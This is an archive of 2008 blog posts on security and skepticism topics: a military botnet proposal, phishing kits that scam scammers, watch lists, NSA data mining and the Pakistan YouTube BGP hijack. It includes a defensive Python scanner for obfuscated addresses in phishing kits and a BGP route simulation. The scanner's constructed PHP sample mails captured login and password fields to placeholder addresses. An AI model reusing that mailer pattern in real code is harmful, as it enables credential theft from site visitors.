Bad military botnet proposal

An article by Col. Charles W. Williamson III titled "Carpet bombing in cyberspace: Why America needs a military botnet" has been published by the Armed Forces Journal.

Col. Williamson, seeing that miscreants are using compromised machines all over the Internet to create botnets used for malicious purposes, has decided that the military needs to create its own, legitimate botnet. He proposes that this would be used in order to respond to online attacks from foreign countries by attacking the attackers, including both government and civilian attacking machines as necessary. He specifically proposes not using compromised machines (which would be illegal), but using machines on the af.mil (U.S. Air Force) network, including all hosts on the NIPRNet (Nonsecret IP Network).

The proposal doesn't really make any sense to me.

First of all, attacks from hostile compromised machines on the Internet occur on a daily basis and are already handled by network service providers. These attacks are never likely to be initiated specifically from an individual attacking country's systems, but rather from compromised systems all over the world--sometimes including compromised systems belonging to the U.S. military. Second, the best way to respond to attacking systems is not by launching hostile traffic back at them, but by filtering them or nullrouting them. Again, network service providers already do this today, and cooperate with each other in addressing major attacks. Third, if the U.S. military sets up a botnet and uses it to launch denial of service attacks, it will be in violation of its own contracts with its network service providers--I don't know of any network service provider that offers a military exception to its terms of service regarding denial of service attacks. Fourth, if all of the U.S. military bots are on its own network, their aggregate bandwidth still can't exceed the bandwidth of its connections to other networks. Fifth, if there are attacks coming from another country that the U.S. is at war with, the recent subsea cable outages in the Middle East suggest that there are other effective mechanisms for disabling their ability to engage in Internet attacks.

Finally, it's not clear to me what benefit would be obtained from the military setting up its own botnet on its own network using its own IPs. Botnets offer two main benefits--(1) offering a distributed platform for computing and traffic generation and (2) creating a buffer of separation between the agent performing an action and the action itself. The second benefit occurs because the miscreant doesn't own the machines that make up the botnet, lots of other people do. A botnet composed entirely of hosts on the military's network is relatively easy to identify, filter, and block--the second benefit doesn't exist. The first benefit is also mostly lost if you use your own network and hosts. The point of a distributed denial of service attack is to use up the other guy's bandwidth, but not your own. That's very easy to do if you're not using your own resources, which is why distributed denial of service attacks use compromised systems and, sometimes, methods to amplify attacks using other people's servers that send out responses that are larger than the requests that prompt them. But if you're using your own resources on your own networks, you're limited to the bandwidth you have at your network interconnection points, and multiplying hosts inside that perimeter gains you nothing except a guarantee that you can saturate your own internetwork connectivity and cut yourself off from the outside unless your target has less bandwidth than you do. It's ironic that Williamson complains about a "fortress mentality," while making a proposal to create a gigantic bot army inside the military's own perimeter. A million-man army doesn't help you if they're inside a fortress with exits that restrict its ability to be deployed, except when you can win the battle with the number of men who can leave the exits at any one time.

I've also posted a comment on the Armed Forces Journal article at the AFJ's forum where I make a few additional points. I also agree with many of the other critical remarks that have been made in the thread there. "Crass Spektakel"'s point that "Whoever controls BGP and the backbone routers controls the internet" and that most of the control of BGP routing and the routing registries resides in the U.S. is a good one. A similar point could be made about DNS.

Other posts on this subject:

Kevin Poulsen at the Wired blog
Jon Stokes at Ars Technica

UPDATE (May 14, 2008): I may take some heat for even suggesting this, but an idea which actually takes advantage of both of the characteristic benefits of botnets I listed above and would be far, far more effective than Williamson's proposal would be if the military produced bot software along the lines of SETI@Home and Folding@Home, which anyone could volunteer to download and run on their home or corporate machines (or better still, made available to run on Xboxes and PlayStation 3s), for use by the military when needed. Some of the abuse worries could be defeated if the activation and deactivation of the software were fully under the control of the end user, and the military obtained appropriate permission from upstream ISPs for activities which would otherwise constitute AUP violations by end users.

I hasten to add that this is still a terrible idea--putting such software out in public makes it a certainty that it would be reverse-engineered, and the probability of it being compromised by third parties for their own abuses would correspondingly increase.

UPDATE: Looks like Paul Raven beat me to the "Milnet@Home" idea, as he dubs it. A commenter at Bruce Schneier's blog also came up with the same idea.

F-Secure's blog also offers some good criticisms of Williamson's proposal.

Monday, April 07, 2008

Scammers scamming scammers

Marco Cova looks in some detail at the contents of some phishing scam kits targeting particular banks that were released to the public recently. These sorts of kits, containing web code, are ordinarily sold to scammers, but these were given away free. It wasn't out of generosity, but part of a larger scam--the code was written using a variety of obfuscation techniques so that the unwary script kiddie who modifies it to send the captured information to their own email address will not receive it. Instead, that information is sent to various email addresses presumably controlled by the distributor of the scammer-scamming phishing kits.
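
As an added illustration (not Marco Cova's code and not taken from the kits themselves), here is a static scan an analyst might run over a kit's PHP source to surface recipient addresses that never appear in plain text. The post does not say which obfuscation techniques were used; base64 literals, hex/octal string escapes and split-string concatenation are assumed here, and the sample kit and every address in it are constructed.

```python
import base64
import binascii
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# A quoted PHP string literal; backslash escapes are kept raw for later decoding.
STRING_RE = re.compile(r"""(['"])((?:\\.|(?!\1).)*)\1""", re.S)
# 'abc' . 'def' written with the same quote style on both sides of the dot.
CONCAT_RE = re.compile(r"""(['"])\s*\.\s*\1""")
HEX_ESC_RE = re.compile(r"\\x([0-9A-Fa-f]{2})")
OCT_ESC_RE = re.compile(r"\\([0-7]{1,3})")
B64_RE = re.compile(r"^[A-Za-z0-9+/]{12,}={0,2}$")


def decode_escapes(text):
    """Resolve \\xNN and \\NNN escapes the way PHP does in double-quoted strings."""
    text = HEX_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), text)
    return OCT_ESC_RE.sub(lambda m: chr(int(m.group(1), 8) & 0xFF), text)


def try_base64(text):
    """Return the decoded ASCII text if `text` is well-formed base64, else None."""
    if len(text) % 4 or not B64_RE.match(text):
        return None
    try:
        return base64.b64decode(text, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None


def find_hidden_recipients(php_source):
    """Map each e-mail address that is only recoverable after decoding
    to the technique that hid it. Addresses readable in the raw source
    (the ones a kit user would see and edit) are excluded."""
    visible = set(EMAIL_RE.findall(php_source))
    merged = CONCAT_RE.sub("", php_source)  # re-join split string literals
    hidden = {}
    for match in STRING_RE.finditer(merged):
        literal = match.group(2)
        unescaped = decode_escapes(literal)
        layers = [("split-string", literal), ("escape", unescaped)]
        for text in (literal, unescaped):
            decoded = try_base64(text)
            if decoded is not None:
                layers.append(("base64", decoded))
        for technique, text in layers:
            for address in EMAIL_RE.findall(text):
                if address not in visible:
                    hidden.setdefault(address, technique)
    return hidden


def build_sample():
    """Constructed stand-in for a kit's mailer script (not real kit code).
    Encoded values are generated here so they are guaranteed to round-trip."""
    b64 = base64.b64encode(b"dropbox@example.net").decode()
    hexed = "".join("\\x%02x" % c for c in b"copy@example.org")
    return "\n".join([
        "<?php",
        '$to = "kitbuyer@example.com";  // the address the kit user edits',
        "$body = 'user=' . $_POST['u'] . ' pass=' . $_POST['p'];",
        'mail($to, "result", $body);',
        '$a = base64_decode("%s");' % b64,
        '$b = "%s";' % hexed,
        "$c = 'arch' . 'ive@exa' . 'mple.net';",
        'mail($a, "r", $body); mail($b, "r", $body); mail($c, "r", $body);',
    ])


if __name__ == "__main__":
    for address, technique in sorted(find_hidden_recipients(build_sample()).items()):
        print(f"{address:25} hidden via {technique}")
```

The scan is a heuristic over string literals only; recipients assembled at run time (for example from character codes or a remote fetch) would need the code to be executed in a sandbox to recover.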

Tuesday, March 25, 2008

Software awards scam

Andy Brice decided to test various download sites to see which ones would give awards (and expect a banner to be posted by the developer's website with a link back) to a piece of "software" that consisted only of a text file named "awardmestars" containing the words "this program does nothing at all" repeated several times. He submitted it to 1033 sites, of which 218 sites listed it and 421 rejected it. Of those that accepted it, 11% gave it an award (he's currently at 23 awards):
The truth is that many download sites are just electronic dung heaps, using fake awards, dubious SEO and content misappropriated from PAD files in a pathetic attempt to make a few dollars from Google Adwords. Hopefully these bottom-feeders will be put out of business by the continually improving search engines, leaving only the better sites.
He notes the following sites which wrote him to say to stop wasting their time, indicating that they actually check submissions:

www.filecart.com

www.freshmeat.net

www.download-tipp.de (German)

The author wonders whether download sites that certify software as "100% clean" actually scan submitted software for malware, but says to test it would be unethical. Actually, something very much like his test could be done, using the EICAR antivirus test file instead of his text file.

(Via Dave Palmer on the SKEPTIC list.)

Sunday, March 23, 2008

Ex-terrorists turned Christian evangelists

It was only a matter of time. Where John Todd, Mike Warnke, "Lauren Stratford," and others found that they could get attention and money by claiming to be ex-Satanists/witches/Illuminati converted to Christian evangelists, we now see "ex-Islamic terrorists" turned born-again Christians and hitting the lecture circuit, and getting paid for appearances at the U.S. Air Force Academy, as the New York Times reports. The Times article ends with the most obvious question:
Arab-American civil rights organizations question why, at a time when the United States government has vigorously moved to jail or at least deport anyone with a known terrorist connection, the three men, if they are telling the truth, are allowed to circulate freely. A spokesman for the F.B.I. said there were no warrants for their arrest.
Of the three speakers, Zak Anani, Kamal Saleem, and Walid Shoebat, Anani is described as the most explicitly preaching born-again Christianity rather than providing information about Islamic terrorism. He also seems to be the one with the clearest record of making false claims about his own background:
Anani, now an evangelical Christian, claims to be an expert on the topic because he killed 223 people in Allah's name, "two-thirds of them by daggers." He even claims to have killed a man for waking him up at 3 a.m. to pray.

Anani, born in Lebanon, said he joined a militant Muslim group in the early 1970s at age 13, and made his first kill shortly after.
...

He said he was soon promoted to troop leader and formed his own regiment, but later met a Christian missionary and converted.

Anani said he was persecuted for his conversion -- even his dad hired assassins to kill him -- and he was technically dead for seven minutes after narrowly escaping a beheading. He fled to the West and moved to Windsor about 10 years ago. His wife and three daughters joined him three years later.

Even in Canada, Anani said he's been physically attacked, and his house and car have been burned in Windsor for speaking out against Islam.

...

Staff. Sgt. Ed McNorton said Windsor police don't have a record of physical attacks against Anani, and his house wasn't burned.

McNorton said someone did torch his car, but it wasn't for the reasons Anani has claimed.

"There is nothing in the report we have to indicate it was in retaliation to his religious beliefs," said McNorton.

Anani's bio also states he lectured at Princeton University. Cass Cliatt, Princeton's media relations manager, said that never happened. She said Anani was scheduled to lecture there in late 2005 with the Walid Shoebat Foundation. But the event was cancelled and the foundation held a news conference at a nearby hotel.

Anani has refused several requests from The Star to revisit his past in detail.

Following a sermon Thursday night from Campbell Baptist Church Pastor Donald McKay -- Anani was scheduled to speak but his lecture was cancelled -- he again refused to answer questions.

...

Anani has said he's 49 years old, which would mean he was born in 1957 or 1958, said Quiggin. If he joined his first militant group when he was 13, it would have been in 1970 or 1971. But the fighting in Lebanon did not begin in earnest until 1975, Quiggin said.

"His story of having made kills shortly after he joined and having made 223 kills overall is preposterous, given the lack of fighting during most of the time period he claims to have been a fighter," Quiggin said. "He also states he left Lebanon to go to Al-Azhar University at the age of 18, which would mean he went to Egypt in 1976. In other words, according to himself, he left Lebanon within a year of when the fighting actually started."

He also pointed to a story on WorldNetDaily in which Walid Shoebat, another ex-terrorist and friend of Anani, also claims to have killed 223 people, two-thirds of them with daggers.

"What a coincidence," Quiggin said.

Quiggin said Anani's description of himself as a Muslim terrorist also "defies logic" based on the time frame.

"Most the groups involved in the fighting in Lebanon were secular and tended to be extreme leftists or Marxists," he said.

Quiggin said religious-based terrorism as part of the warring in Lebanon didn't begin until after 1979, following the revolution in Iran, the Soviet attack on Afghanistan and the attack on the Grand Mosque in Mecca by Sunni Muslim extremists.

Anani's claim to have survived a beheading attempt is also questionable, said Quiggin.

Jon Trott and Mike Hertenstein, can you take a look at these guys?

(Hat tip to Jeffrey Shallit.)

Thursday, March 20, 2008

Most antiterrorism spending is wasteful

The March 6, 2008 issue of The Economist features lots of interesting articles (it includes one of the quarterly technology reviews), one of which is "Feel safer now?" This is a report on a study by economists in Texas and Alabama commissioned by the Copenhagen Consensus, which looks at the effects of increased spending on counterterrorism efforts and "homeland security" globally since 2001. They calculate that while such spending has increased by somewhere between $65 billion and $200 billion a year, the benefits are far smaller than the costs of terrorism, which were about $17 billion in 2005. While the spending may have prevented some incidents, even if this extra spending prevented 30 attacks like the July 2005 London bombings every year, it would still be more expensive than the damage from terrorism. The authors suggest that the benefits from increased counterterrorism spending have been about 5-8 cents for each dollar of spending, whereas if instead money was spent specifically on disrupting terrorist finances, $5-$15 of benefits could be obtained for each dollar spent.

Saturday, March 15, 2008

Terrorist watch list grows past 700,000 names

The ACLU reports that the Terrorist Screening Center's watch list reached 700,000 names in September 2007, and is adding 20,000 new names per month. "At that rate, our list will have a million names on it by July. If there were really that many terrorists running around, we'd all be dead."

Names on the list include:

Robert Johnson
Alexandra Hay
Evo Morales (president of Bolivia)
Saddam Hussein (dead former dictator of Iraq)
the 9/11 hijackers (all still dead)
Gary Smith
John Williams
Edward Kennedy (Massachusetts Senator)
John Lewis (U.S. Rep. from Georgia)
Daniel Brown (U.S. soldier detained on way home from Iraq)
James Moore (author of book critical of Bush administration)
Catherine ("Cat") Stevens (wife of Sen. Ted Stevens)
Yusuf Islam (formerly known as Cat Stevens)
Vernon Lewis (retired Major General, U.S. Army)
Robert Campbell (U.S. Navy, retired)
David Nelson
John William Anderson
Don Young (U.S. Rep. from Alaska)

The whole idea of checking names for flight screening is nearly pointless, since terrorists are capable of getting fake ID. It's absolutely idiotic to have extremely common names on the list and subject everyone who happens to have a common name to extra screening every time they fly. The right way to do screening is to use mechanisms like randomly subjecting people to extra screening and to have people undercover trained to identify suspicious behavior in the terminal--and to use multiple mechanisms that are randomly changed from day to day, so that security measures tested on one day will not be the exact measures in place on a later day.

UPDATE (March 18, 2008): Note that the no-fly list is a subset of the terrorist watch list. The former is what I criticize in the last paragraph. An FBI audit has stated that the information the FBI supplies for the terrorist watch list is "outdated and inaccurate."

Friday, March 14, 2008

Homeland Security threat

The Miami Herald has uncovered a new Homeland Security threat--and it's U.S. Customs and Border Protection agents that are committing crimes. Bribery, drug trafficking, migrant smuggling, embezzlement, and other crimes have become so prevalent that a senior manager has issued a memo pointing out that agents are supposed to uphold, not break the law:

U.S. Customs and Border Protection is supposed to stop these types of crimes. Instead, so many of its officers have been charged with committing those crimes themselves that their boss in Washington recently issued an alert about the "disturbing events" and the "increase in the number of employee arrests."

Thomas S. Winkowski, assistant commissioner of field operations, wrote a memo to more than 20,000 officers nationwide noting that employees must behave professionally at all times -- even when not on the job.

"It is our responsibility to uphold the laws, not break the law," Winkowski wrote in the Nov. 16 memo obtained by The Miami Herald.

(Hat tip to Dave Palmer on the SKEPTIC list.)

Wednesday, March 12, 2008

NSA's data mining and eavesdropping described

The March 10 Wall Street Journal contains a fairly detailed description of the data mining operation being run by the NSA. The program described is more data mining than eavesdropping, though it does involve the collection of transactional data like call detail records for telephone calls, and intercepted Internet data like web search terms and email senders and recipients. Also included is financial transaction data and airline data. I think most of this had already been pieced together, but this is a fairly comprehensive summary in one place. The WSJ story reports that leads generated from the data mining effort are then fed into the Terrorist Surveillance Program, which does warrantless eavesdropping. (An earlier version of this post incorrectly referred to the whole operation as the Terrorist Surveillance Program.)

Saturday, March 01, 2008

Jeremy Jaynes loses appeal on spamming case

Jeremy Jaynes, the spammer who was convicted and sentenced to nine years in prison in 2003 for violating Virginia's anti-spam law, has lost his appeal before the Virginia Supreme Court in a 4-3 ruling. Several of the dissents claimed that Virginia's anti-spam law, which criminalizes unsolicited bulk email with falsified headers, even if it is political or religious in content rather than commercial, is a violation of the First Amendment. The quotations from Justice Elizabeth Lacy and Jaynes' attorney Thomas M. Wolf both state that the law has diminished everyone's freedom by criminalizing "bulk anonymous email, even for the purpose of petitioning the government or promoting religion."

Both Lacy and Wolf misrepresent the law, which makes it a crime to "Falsify or forge electronic mail transmission information or other routing information in any manner in connection with the transmission of unsolicited bulk electronic mail through or into the computer network of an electronic mail service provider or its subscribers."

There is a difference between forging headers and sending anonymous email--the latter does not require the former, and the latter is not prohibited by the law. Jaynes wasn't just trying to be anonymous--he was engaged in fraud, and falsifying message headers and from addresses to try to avoid the consequences of his criminality. He wasn't using anonymous remailers to express a political or religious message, and if he had been, he wouldn't have been able to be charged under this law.

UPDATE (September 12, 2008): The Virginia Supreme Court has reversed itself and struck down Virginia's anti-spam law as unconstitutional, on the grounds that prohibiting false routing information on emails infringes upon the right to anonymous political or religious speech. This is a very bad decision for the reasons I gave above. There are ways to engage in anonymous speech without doing what Jaynes did, falsifying message headers and domain names. The court's argument that one must falsify headers, IP addresses, and domain names in order to be anonymous is factually incorrect. Anonymity doesn't require header falsification, it only requires *omission* of identifying information.

Monday, February 25, 2008

Pakistan takes out YouTube, gets taken out in return

As ZDNet reports, yesterday afternoon, in response to a government order to filter YouTube (AS 36561), Pakistan Telecom (AS 17557, pie.net.pk) announced a more-specific route (/24; YouTube announces a /23) for YouTube's IP space, causing YouTube's Internet traffic to go to Pakistan Telecom. YouTube then re-announced its own IP space in yet more-specific blocks (/25), which restored service to those willing to accept routing announcements for blocks that small. Then Pakistan Telecom's upstream provider, PCCW (AS 3491), which had made the mistake of accepting the Pakistan Telecom /24 announcement for YouTube in the first place, shut off Pakistan Telecom completely, restoring YouTube service to the world minus Pakistan Telecom. They got what they wanted, but not quite in the manner they intended.

Don't mess with the Internet.

Martin Brown gives more detail at the Renesys Blog, including a comment on how this incident shows that it's still a bit too easy for a small ISP to disrupt service by hijacking IPs, intentionally or inadvertently. Danny McPherson makes the same point at the Arbor Networks blog, and also gives a good explanation of how the Pakistan Internet provider screwed up what they were trying to do.
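The route selection described in this post can be reproduced in a few lines. This is an added example, not code from any of the linked sources: 10.10.0.0/23 is a constructed placeholder for the affected address space, the AS numbers are the ones named above, and `best_origin` and `origin_check` are hypothetical helper names.

```python
import ipaddress

# Constructed sample data: 10.10.0.0/23 is a placeholder for the victim's
# address space; the AS numbers are the ones named in the post.
OWNER_AS, HIJACK_AS = 36561, 17557
REGISTERED = {ipaddress.ip_network("10.10.0.0/23"): OWNER_AS}

ANNOUNCEMENTS = [  # (stage, prefix, origin AS)
    (1, "10.10.0.0/23", OWNER_AS),     # legitimate covering route
    (2, "10.10.1.0/24", HIJACK_AS),    # more-specific from the wrong origin
    (3, "10.10.1.0/25", OWNER_AS),     # owner answers with still smaller blocks
    (3, "10.10.1.128/25", OWNER_AS),
]

def best_origin(dest, stage, max_len=32):
    """Longest-prefix match over routes seen up to `stage`, on a router that
    drops prefixes longer than `max_len`. Origin plays no part in the choice."""
    addr = ipaddress.ip_address(dest)
    routes = [(ipaddress.ip_network(p), o) for s, p, o in ANNOUNCEMENTS if s <= stage]
    usable = [(n, o) for n, o in routes if addr in n and n.prefixlen <= max_len]
    return max(usable, key=lambda r: r[0].prefixlen)[1] if usable else None

def origin_check(prefix, origin):
    """Flag an announcement inside registered space that comes from another AS."""
    net = ipaddress.ip_network(prefix)
    for space, owner in REGISTERED.items():
        if net.subnet_of(space):
            return "ok" if origin == owner else "origin-mismatch"
    return "unregistered"

if __name__ == "__main__":
    for stage in (1, 2, 3):
        print(stage, best_origin("10.10.1.10", stage),
              best_origin("10.10.1.10", stage, max_len=24))
    for _, prefix, origin in ANNOUNCEMENTS:
        print(prefix, origin, origin_check(prefix, origin))
```

A router that filters anything longer than a /24 never sees the stage 3 fix, which is why the /25 announcements only helped networks willing to accept blocks that small; an origin check at the upstream would have rejected the stage 2 announcement outright.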

Somebody still needs to update the Wikipedia page on how Pakistan censors the Internet to cover this incident.

UPDATE: BoingBoing reports that the video which prompted this censorship order was an excerpt from Dutch Member of Parliament Geert Wilders' film "Forbidden" criticizing Islam, which was uploaded to YouTube back on January 28. I've added "religion" and "Islam" as labels on this post, accordingly. The two specific videos mentioned by Reporters without Borders as prompting the ban have been removed from YouTube, one due to "terms of use violation" and one "removed by user." The first of these two videos was supposedly the Geert Wilders one; the second was of voters describing election fraud during the February 18 Parliamentary elections in Pakistan. This blog suggests that the latter video was the real source of the attempted censorship gone awry, though the Pakistan media says it was the former. So perhaps the former was the pretext, and the latter was the political motivator.

A "trailer" for Wilders' film is on YouTube here. Wilders speaks about his film on YouTube here and here. Ayaan Hirsi Ali defends Wilders on Laura Ingraham's show on Fox News here. (Contrary to the blog post I've linked to, Hirsi Ali was not in the Theo Van Gogh film "Submission Part One," which can itself be found here; rather, she wrote it. Van Gogh was murdered as a result of it. The beginning and end are in Arabic with Dutch subtitles, but most of it is in English with Dutch subtitles.)

UPDATE (February 26, 2008): This just in, from Reuters--Pakistan "might have been" the cause of the YouTube outage. Way to be on the ball with breaking news, Reuters!

The Onion weighs in on the controversy!

Sunday, February 24, 2008

New Mexico InfraGard conference

On Friday, I attended the New Mexico InfraGard Member Alliance's "$-Gard 2008" conference in Albuquerque. It was an excellent one-day conference that should be used as a model by other chapters. The conference was open to the public, and featured an informative and entertaining two-hour seminar on fraud and white collar crimes by Frank Abagnale, author of the autobiographical Catch Me If You Can and anti-fraud books The Art of the Steal and Stealing Your Identity. (Another version of Abagnale's talk can be viewed as an online webinar courtesy of City National Bank.) Abagnale argued that fraud has become much easier today than it was when he was a criminal forger, with numerous examples, and also offered some simple and relatively inexpensive ways for businesses and individuals to protect themselves. For example, he recommended the use of microcut shredders, and observed that his own business keeps shredders near every printer, and no documents get thrown away; everything gets shredded. He recommended the use of a credit monitoring service like Privacy Guard, and that if you write checks, you use a black uniball 207 gel pen, which is resistant to check-washing chemicals. For businesses that accept cash, he recommended training employees in some of the security features of U.S. currency rather than relying on pH testing pens, which are essentially worthless at detecting counterfeit money. By recognizing where bills use optically variable ink, for example, you can easily test for its presence in the time it takes you to accept bills from a customer and transfer them into a cash register. He also recommended that businesses use bank Positive Pay services to avoid having business checks altered.

Other speakers included Anthony Clark and Danny Quist of Offensive Computing, who gave a talk on "Malware Secrets," based on their research and collection of 275,000 malware samples. Their talk included an overview of the economics of malware, which I believe is essential for understanding how best to combat it. They looked at the underground economy fairly narrowly focused on malware itself, and the cycle of its production, use, reverse engineering by whitehats, the development of antivirus patterns, and then demand for new undetectable malware, and observed that in that particular cycle it's probably the legitimate security companies such as antivirus and IDS vendors who make the most money. They didn't really look at the broader features of the underground economy, such as how botnets are used as infrastructure for criminal enterprises, or the division of criminal labor into different roles to disperse risk, though they certainly mentioned the use of compromised machines for spamming and phishing attacks. They skipped over some of the technical details of their work on automating the unpacking and decryption of malware, which was probably appropriate given the mixed levels of technical background in this audience. A particularly noteworthy feature of their research was their list of features of antivirus software that should be examined when making a purchase decision--performance, detection rates, miss rates, false positive rates, system intrusiveness, a product's own security, ease of mass deployment, speed, update frequency, use of signatures vs. other detection methods, ability to clean, capabilities with various categories of malware (rootkits, trojans, worms, backdoors, spyware), and ability to detect in real time vs. during a scan.

Alex Quintana of Sandia National Labs also spoke about current trends in malware, in the most frightening talk of the conference. He talked about how malware has gone from something that attacks exposed servers on the Internet to something that individual clients pull to their machines from the Internet, usually via drive-by downloads. He demonstrated real examples of malware attacks via web pages and via Shockwave Flash, PowerPoint, and Word documents, and explained how one of his colleagues has coined the word "snares" for emails or web pages that lure individuals into targeted drive-by malware downloads. There was a wealth of interesting detail in his presentation, about trojans that use covert tunnels and hiding techniques, injecting themselves into other running processes, using alternate data streams, and obfuscated information in HTTP headers and on web pages. One trojan he described rides on removable media such as USB thumbdrives and runs when inserted into a PC thanks to Windows Autorun; it drops one component that phones home to accept instructions from a command and control server, and another that causes the malware to be written out on any other removable device inserted into the machine. It's a return of the old-fashioned virus vector of moving from machine to machine via removable media rather than over the network.

From law enforcement, there were presentations from Melissa McBee-Anderson of the Internet Crime Complaint Center (IC3, another public-private partnership, which acts as a clearinghouse for Internet crime complaints and makes referrals of complaints to appropriate federal, state, local, and international law enforcement agencies) and from various agents of the Cyber Squad of the Albuquerque FBI office. These presentations were somewhat disappointing in that they demonstrated how huge the problem is, yet how few prosecutions occur. For example, after the 2004 tsunami disasters, there were over 700 fake online charities set up to prey on people's generosity after a disaster, yet only a single prosecution came of it. In 2005, the number of fake online charities for hurricanes Katrina and Rita was over 7,000, yet only five prosecutions came of those, including one in Albuquerque. Yet even that "successful" prosecution led to no jail time, only community service and probation. Frank Abagnale's presentation also included some woeful statistics about prosecutions for white collar crime and check fraud that explicitly made the same point that was implicit in several of the law enforcement presentations.

To IC3's credit, however, they showed an example of a link chart generated from their crime complaint data, a very tiny portion of which was brought to them by a law enforcement agency seeking more information, the rest of which came from multiple received complaints. That link chart showed many interconnected events by five organized fraud gangs. Ms. McBee-Anderson also reported on successful international prosecutions against individuals at Lagos, Nigeria's "walking Wal-Mart," where people were selling goods purchased with stolen credit card information and using forged cashier's checks. (I'm still amazed that anyone actually falls for the Nigerian online fraud schemes, but they do.)

The conference did a good job of making clear some specific threats and offering recommendations on necessary (yet unfortunately individually insufficient) defenses. It's quite clear that relying solely on law enforcement to provide you with a remedy after the fact is a bad idea. It's essential that private enterprises take preventative measures to protect themselves, and use a layered, defense-in-depth approach to do so.

UPDATE (23 October 2022): Note that Frank Abagnale's life story of con artistry turned out itself to be a con, as documented in Alan C. Logan's book, The Greatest Hoax on Earth: Catching Truth, While We Can (2020).